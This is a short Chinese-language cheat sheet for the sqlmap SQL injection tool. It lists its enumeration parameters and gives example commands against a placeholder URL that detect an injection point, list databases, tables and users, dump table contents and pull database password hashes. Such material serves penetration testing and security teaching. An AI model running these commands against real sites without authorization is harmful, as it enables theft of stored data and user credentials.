sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了
基本参数
is-dba 当前用户权限
dbs 所有数据库
current-db 当前数据库
users 所有用户
current-user 当前用户
--tables
--columns
--dump
--dump-all
--level
--passwords 枚举所有用户密码
--roles 列出数据库dbajuese
--privileges 列出数据库dba权限
-D
-T
-C
--dbms=mysql oracle mssql 指定数据库
--schema --batch --exclude-sysdbs 查看数据库的架构 (比较大的一个命令)
使用实例:
#是否存在注入点
sqlmap -u 'http://www.xxxx.com/mod.php?id=1'
#判断是不是dba权限
sqlmap -u 'http://www.xxxx.com/mod>id=1' --is-dba
#列所有的数据库
sqlmap -u 'http://www.xxxx.com/mod?id=1' --dbs
#看当前用户
sqlmap -u 'http://www.xxxx.com?id=1' --current-user
#查看当前数据库
sqlmap -u 'http://www.xxxx.com?id=1' --current-db
#查看数据库的表
sqlmap -u 'http://www.xxxx.com?id=1' --tables -D dbname
#查看test数据库中sc表的列
sqlmap -u http://www.xxxx.com?id=1 --columns -T tablename -D dbname
#把表中的数据转储
sqlmap -u 'http://www.xxxx.com?id=1' --dump -T tablename -D dbname
#或者只转储某几列
sqlmap -u 'http://www.xxxx.com?id=1' --dump -C id,name -T tablename -D dbname
#查看有哪些用户
sqlmap -u 'http://www.xxxx.com?id=1' --users
#查看用户密码
sqlmap -u 'http://www.xxxx.com?id=1' --passwords